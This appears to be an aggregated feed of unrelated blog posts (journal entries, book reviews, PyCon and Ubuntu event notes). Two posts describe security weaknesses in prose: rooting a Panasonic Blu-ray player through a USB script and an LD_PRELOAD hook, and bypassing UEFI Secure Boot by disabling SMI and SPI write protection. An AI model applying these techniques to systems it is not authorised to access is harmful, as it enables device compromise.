Since Zond7 left Monday night I have suddenly degenerated from my smug routine, forget to eat meals, and there is laundry everywhere. somehow instead of writing extra poetry and living in a nice neat environment I have entered odd workaholic and not taking care of myself mode.
I think it is also the tramadol and extra coffee. Must fix that tomorrow.
Tea only after 1 cup of coffee, and no tramadol after .. umm..... 1pm?
I wrote to the EFF as i said i would, yesterday i did a fun zine reading thing at DU, I worked quite hard, went to all the meetings ever fucking invented, and hacked some portals whicih was super relaxing and fun, and grocery shopped.
i read from a funny old zine and a section from a newish poem that i think is nearly done.
Cannot do enough at work to feel like i'm on top of things or truly competent. HOw to limit things????? why do i keep on taking more responsiblity?
i do not want to burn out.
also i went to 2 doctor appointments which while not specially stressful or hard, and i went in a cab, were still stressful and hard.
i miss zond7 quite a lot!
i think i need to strictly enforce some hours off even if i can't take a whole day ... which i don't feel that i can....
I doubt I'll ever so much as see the mountain, but nevertheless having appropriated it as a metaphor for my own decidedly non-life threatening and unrelated personal enterprise, I acknowledge and mourn the deaths of 16 men on April 18:
Mingma Nuru Sherpa
Ang Tshiri Sherpa
Phurba Ongyal Sherpa
Lakpa Tenjing Sherpa
Chhiring Ongchu Sherpa
Then Dorjee Sherpa
Phur Temba Sherpa
Pasang Karma Sherpa
Tenzing Chottar Sherpa
Pem Tenji Sherpa
Ash Bahadur Gurung
(Per Nepali report and Alan Arnette.)
Photo by Bernard Goldbach
More from synedochic and Jon Krakauer.
Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.
Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Runnings strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.
/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.
But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so, so then it was just a matter of building a library that hooked open() and launched inetd and dropping that into the right place, and then opening the browser.
This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.
The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
So, while the first two books were concurrent with different characters, the third starts right after those and continues with both sets of characters surviving together in the decimated world. With one exception (the new information about the genetic spliced creatures), the current-time story (surviving) isn't very notable. Most of the book is actually about one character's history, Zeb, and about another character retelling it to the Crakers. The style is readable, though a bit put on toward the end when one of the Crakers is actually telling the story.
The book went by fast and I liked it well enough, but I wouldn't say it was mindblowing. It did redeem The Year of the Flood a fair bit.
This book generally follows three character viewpoints: Bazhell, the lead for all of the books and champion of the war god; Leanna, who was a teenager when we last saw her and is now an adult war maid; and the villain of the moment. Like previous books, the villain sections remain a bit of a slog - they're where I most often put the book down, because I obviously don't like the character. It's not my favourite form of exposition.
The relationship between Bazhell and Leanna (you may recall my cringing at it while she was younger) is still incredibly meh. At least it's not really drawn out, but I didn't believe them as a pairing and it reads a bit creepy the same way Sparhawk/Ehlana did (if you're unfamiliar: young girl puts designs on older warrior and eventually "traps" him into marriage as an adult). Not as bad, but... eh.
Overall, the series may have hit its peak already for me. There were to many characters with similar names to try to keep straight, the stakes are getting unreasonably high and the battles unpicturably large. It's pretty clear there's another book planned to follow, and I'll probably read it, but it's getting too high fantasy for me if this is any indication.
A couple weeks ago I was in Montreal for PyCon 2014. It was an amazing conference, but I was also glad to have some time to explore the beautiful city that is Montreal.
On Thursday (2nd day of tutorials) I didn’t have anything scheduled conference-wise, so I met up with my friend and long time Ubuntu contributor John Chiazzese (IdleOne). We’ve worked together online on Ubuntu for several years, and even both lived in the same area at the same time at one point, but we never managed to meet. My love of zoos landed us at the Montreal Biodome, housed in a former Olympic building.
The Biodome takes you through 4 different environments where they have mini-ecosystems for each and animals that populate the zones. The lynx were a big draw for me:
The river otter was also quite adorable and looking for attention. I also quite enjoyed the monkeys! And the penguins!
One of the evenings after the conference I joined a few of my colleagues to see And Then There Was Light sound and like show at the Notre Dame Basilica, not far from the convention center.
As a fan of historical religious buildings, I was eager for my chance to walk around the basilica as a tourist. The “sound and light show” portion of the show was a bit cheesy, giving folks a history of the French colonists and the basilica itself, but we had fun. Afterwards, we had 15 minutes to walk around and take photos, hooray!
Once they had pulled up the curtains used during the show, the interior did not disappoint. The alter in particular was spectacular:
I was also exposed to a lot of great food in Montreal, only a fraction of which I could eat. I had unfortunately fallen ill just before my trip and was on a strict bland diet – no red meat, no alcohol, no fatty foods. In a city full of steakhouses, wine and cheese this was a special kind of torture, but it did allow me to explore the menus beyond what I might typically order (and I did cheat a bit with the cheese). I ate a lot of chicken, fish and vegetables.
I was fortunate to have decent walking weather during most of the trip, but as the event wound down I found the chilly weather coming back, I even hear that there were some flurries the day after I left. Montreal is great, but was nice to be on my way back to California when the snow returned!
More photos from my tourist adventures in Montreal here: https://www.flickr.com/photos/pleia2/set
Read The Goblin Emperor, which I highly recommend! OMG... more like this!
Also, Pen Pal by Francesca Forrest.
Tomorrow the next Ubuntu Long Term Support (LTS) release comes out, 14.04, development code name Trusty Tahr. In preparation, I was putting together some materials for our release event next week and found myself looking for the Tahr artwork when I remembered that it was included in the installer. So now I’ll share it with you as well!
I haven’t found an svg version of this logo, but I’ll be sure to update this post if I do.
Thanks to Tom Macfarlane of Canonical for emailing me a copy of the svg version! You can get a copy here.
Looking for something slightly different? The Xubuntu team also included a tahr in our installer, created by Simon Steinbeiß:
This png has transparency, which make it show grey on white, but you can flavor it with any color you wish!
Enjoy! And happy release everyone!
So having gone to sleep on a mythological bent, I ended up with a fair bit of Patricia Wrede's short story about the frying pan of doom bouncing about the dream landscape, which was still the Giant's Causeway (but clearly where it borders the Enchanted Forest).
And then when I woke up my radio alarm was playing the song Call Me Maybe, which I ended up hearing/dreaming as the daleks version of the song as I went back into snooze land.
(I just met you, and this is a crazy! I'm a Dalek, ex-ter-mi-nate!)
- - -
Dreaming about Patricia's Wrede's story made me somewhat crave after battle triple chocolate helmet cake, even if mostly I was interviewing kitchen maids who kept being hidden princesses in disguise, but it turned out one of them could really cook so it was ok.
- - -
So one of the tours of the Giant's Causeway is actually the Game of Thrones tour of Northern Ireland. (There is a 1 day option, which is all I'd have time for). I am embarrassed by how tempting that is, and trying to justify it to myself as the "interesting historical scenery with an added geeky bonus" tour.
It describes a couple of attacks. The first is that some platforms store their Secure Boot policy in a run time UEFI variable. UEFI variables are split into two broad categories - boot time and run time. Boot time variables can only be accessed while in boot services - the moment the bootloader or kernel calls ExitBootServices(), they're inaccessible. Some vendors chose to leave the variable containing firmware settings available during run time, presumably because it makes it easier to implement tools for modifying firmware settings at the OS level. Unfortunately, some vendors left bits of Secure Boot policy in this space. The naive approach would be to simply disable Secure Boot entirely, but that means that the OS would be able to detect that the system wasn't in a secure state. A more subtle approach is to modify the policy, such that the firmware chooses not to verify the signatures on files stored on fixed media. Drop in a new bootloader and victory is ensured.
But that's not a beautiful approach. It depends on the firmware vendor having made that mistake. What if you could just rewrite arbitrary variables, even if they're only supposed to be accessible in boot services? Variables are all stored in flash, connected to the chipset's SPI controller. Allowing arbitrary access to that from the OS would make it straightforward to modify the variables, even if they're boot time-only. So, thankfully, the SPI controller has some control mechanisms. The first is that any attempt to enable the write-access bit will cause a System Management Interrupt, at which point the CPU should trap into System Management Mode and (if the write attempt isn't authorised) flip it back. The second is to disable access from the OS entirely - all writes have to take place in System Management Mode.
The MITRE results show that around 0.03% of modern machines enable the second option. That's unfortunate, but the first option should still be sufficient. Except the first option requires on the SMI actually firing. And, conveniently, Intel's chipsets have a bit that allows you to disable all SMI sources, and then have another bit to disable further writes to the first bit. Except 40% of the machines MITRE tested didn't bother setting that lock bit. So you can just disable SMI generation, remove the write-protect bit on the SPI controller and then write to arbitrary variables, including the SecureBoot enable one.
This is, uh, obviously a problem. The good news is that this has been communicated to firmware and system vendors and it should be fixed in the future. The bad news is that a significant proportion of existing systems can probably have their Secure Boot implementation circumvented. This is pretty unsurprisingly - I suggested that the first few generations would be broken back in 2012. Security tends to be an iterative process, and changing a branch of the industry that's historically not had to care into one that forms the root of platform trust is a difficult process. As the MITRE paper says, UEFI Secure Boot will be a genuine improvement in security. It's just going to take us a little while to get to the point where the more obvious flaws have been worked out.
 Unless the malware was intelligent enough to hook GetVariable, detect a request for SecureBoot and then give a fake answer, but who would do that?
 Impressively, basically everyone enables that.
 Great for dealing with bugs caused by YOUR ENTIRE COMPUTER BEING INTERRUPTED BY ARBITRARY VENDOR CODE, except unfortunately it also probably disables chunks of thermal management and stops various other things from working as well.
As I mentioned in my post about the PiDoorbell workshop, this past week I attended my first PyCon in beautiful (if chilly) Montreal, QC. I did some touristing, but I’ll write about that once I have all my photos up…
But now, the conference!
It was the first conference I’ve attended where I volunteered to help out with the HP booth. I was worried that my role as an engineer on the OpenStack project would leave me completely unprepared to answer questions about HP specifically, but I was instead greeted with kinship among most folks who I spoke with as they could appreciate HP’s investment in open source (and Python). I was also pleased to learn that the guys from the local HP office who came to help out with the booth were also all engineers, focused on either network or printing. Having the actual engineers to helped design the hardware we had on display at the booth was really cool.
Plus, I’m sure it helped that we have a bunch of open Python, OpenStack and other cloud jobs, so plenty of folks were eager to hear about those.
I wasn’t at the booth all weekend, I attended all the keynotes and several talks throughout the event. I think my favorite talks ended up being Track memory leaks in Python by Victor Stinner, Subprocess to FFI: Memory, Performance, and Why You Shouldn’t Shell Out by Christine Spang and In Depth PDB by Nathan Yergler. Upon reflection this makes sense given my work in ops, I’m much more likely to be debugging Python code in my typical day than writing something, so the talks about tracking down problems and performance issues are right up my alley.
The keynotes all three days were great. On Sunday I was particularly struck by the conference gender diversity. In addition to having a reported 1/3 female speakers and attendees, all the leadership in the Python community seem genuinely dedicated to the issue. I’m so used to projects that are still arguing over whether a problem exists let alone taking solid, unapologetic steps to correct the cultural bias. So thank you Python community, for giving us an opportunity to catch up, it’s working!
And finally, since I can’t go anywhere anymore without getting pulled into an OpenStack event, I finally met Dana Bauer from Rackspace this week and she invited me to come help out with a short OpenStack workshop for women on Sunday morning from 10 until noon. The lab they had set up didn’t quite work out, but it gave attendees the opportunity to go in the direction they wanted to. I was able to help a bit here and there, and James E. Blair gave a mini-presentation to a few folks on how to get going with DevStack.
At lunch I was able to meet up with Tatiana Al-Chueyr to chat some about the contribution workflow for OpenStack, which is always a lot of fun for me.
I’m pretty much exhausted from all the socializing, but as always with these conferences it was great to meet up with and chat with friends I haven’t seen in a long time. Thanks to everyone for such a fun week!
Tonight the weather started to turn chilly again, time to head home.
The release of Ubuntu 14.04 (Trusty Tahr) LTS is coming up on Thursday, April 17th!
To celebrate, the Ubuntu California team in San Francisco will be hosting an Ubuntu release party at AdRoll! Huge thanks to them for offering us space for this event.
AdRoll is located at 972 Mission Street in San Francisco. It’s within easy walking distance of the Powell Street BART and MUNI stations, which we recommend since parking can be expensive downtown.
Our party will be very casual with free pizza and drinks for attendees. But we do have planned…
- Mini presentation highlighting Ubuntu 14.04 features
- Laptops running various flavors of 14.04
- Tablets and phones running the latest Ubuntu build
- Ubuntu quiz, with prizes!
So if you’re in the area and would like to join us, please RSVP here:
Alternatively you can email me directly at firstname.lastname@example.org and I’ll get you added to the attendee list.
San Francisco isn’t the only active part of the state this release, San Diego is also hosting an event, on April 17th, details here. If you’re near Los Angeles, Nathan Haines is collaborating with the Orange County Linux Users Group (OCLUG) to do an installfest on Saturday May 24th, learn more here.
Not in California? Events are coming together all around the world, check out the LoCo Team Portal to see if there is an event being planned in your area: 14.04 Release Parties.
This week I had the opportunity to attend PyCon for the first time. Since beginning to use Python in my systems work so much last year, I’ve had increasing interest in participating in this conference in some capacity, so when the opportunity came around at work to staff the HP booth here in Montreal I was happy to volunteer.
I was also brought to PyCon to be a Teaching Assistant for the Build your own PiDoorbell ! – Learn Home Automation with Python with fellow CodeChix members Rupa Dachere, Akkana Peck, Deepa Karnad Dhurka, Serpil Bayraktar and Stuart Easson.
We spent several weeks preparing for this tutorial. I made the trek down to Palo Alto twice to attend mini-sprints so we could test out the instructions in person prior to the event. We were able to add a number of improvements to both the code and documentation through these events and worked out some of the logistical issues of doing such a hardware event at a conference venue.
The actual tutorial was held on Wednesday afternoon. Attendees quickly piled in and we were able to distribute our kits. Somehow we ended up with a few too many registrants but were able to scramble together a few extra pieces to make it work for everyone.
The tutorial was split into several sections, with the tutorial leads (Rupa and Akkana) giving presentations and us TAs going around and helping everyone with their setups when they got stuck. The biggest challenge for most was getting their system to talk to the Raspberry Pi, as we had folks on various operating systems with all kinds of network and USB setups.
Once we got everyone talking to the Pis, it was time for the fun stuff! Akkana gave a great presentation that was a tour of the hardware of the Raspberry Pi, including the setup of the GPIO pins configuration. For more about some cool hardware stuff she’s been doing with the Pi, I highly recommend her blog posts on the topic.
Then we had an led.py script to allow folks to make an LED blink:
As you can see, we’re using solderless breadboards so we didn’t have the complexity of soldering, thank goodness.
Then came the meat of the tutorial, wiring up the distance sensor (and camera if they had one) to actually detect when objects passed and take a photo. I brought along both my Raspberry Pi NoIR Camera Board – Infrared-sensitive Camera and my webcam from my desk at home so attendees could play around with them if they didn’t have ones of their own.
Surprisingly for a hardware tutorial with such a diversity of host systems, I’m happy to report that most of the students were able to get the tutorial fully completed – at least to the point of taking pictures, if not the upload and notification portion. It was a lot of work for us TAs as we ran around helping everyone and debugging serial and networking issues, but it was worth it to see how much fun everyone had when they finally got an LED to blink or took their first picture.
All of the slides and source code is freely licensed, but the repository hasn’t been made available yet as Rupa wanted to fix some important bugs first (can’t have people frying their Pis!). But never fear, I’ll be following up to make sure it’s made available as soon as possible so others can do this too!
I’ve uploaded more photos from the event here: https://www.flickr.com/photos/pleia2/set
I’ve had a very busy year so far talk-wise. Back in January I gave a handful of sysadmin focused talks at Linux.conf.au in Perth, Western Australia. In February I did similar at the Southern California Linux Expo. In May I’ll be drifting slightly away from a Linux-only crowd to present at LOPSA-East in New Brunswick, New Jersey on May 3rd.
First up on the schedule I’ll be doing my Code Review for Sys Admins talk:
I’m a member of the OpenStack Infrastructure team which is a geographically distributed team of systems administrators from several different companies who work together in public to maintain the infrastructure described at http://ci.openstack.org.
To achieve this, we use a code review system that leverages Gerrit as the interface for peer review and Jenkins to run some basic configuration and code syntax checking against our submissions. This allows us to maintain for code and config file integrity and gives us a nice platform so that our fellow systems administrators can comment on and improve solutions we come up with. We also use IRC, Etherpad and more for collaboration, which I will discuss.
I love giving this talk and I’m excited to be giving it at a conference focused at sysadmin-type folks in the industry.
But it gets better, they’ve also asked me to keynote on Saturday evening!
I’ve titled my talk Universal Design for Tech: Improving Gender Diversity in our Industry (thanks to Leigh Honeywell for the title idea):
Universal Design is a principle in accessibility that accessible design makes things better for everyone. A key example of which are curb cuts and door openers which help those who are disabled but also folks with luggage and parents with strollers.
Elizabeth will discuss ideas on how to improve gender diversity in our industry, but many of the tips will help everyone beyond improvements that come through diversity. From offering formal education for systems administration to offering flexible schedules and work arrangements, there are many things that can be done to attract much-needed talent.
As someone who has made it in the industry I’m keen on preserving the environment that I’ve grown and thrived in, but also in making small changes that I know would have helped me along the way and will help others, including women.
I also took some time to chat with Tom Limoncelli about my talk, which he’s posted on the Everything Sysadmin blog: Interview with LOPSA-East Keynote: Elizabeth Krumbach Joseph
Registration is still open for the conference and I hear there might even be some space at the hotel left (but it’s filling up fast!). Hope to see you there!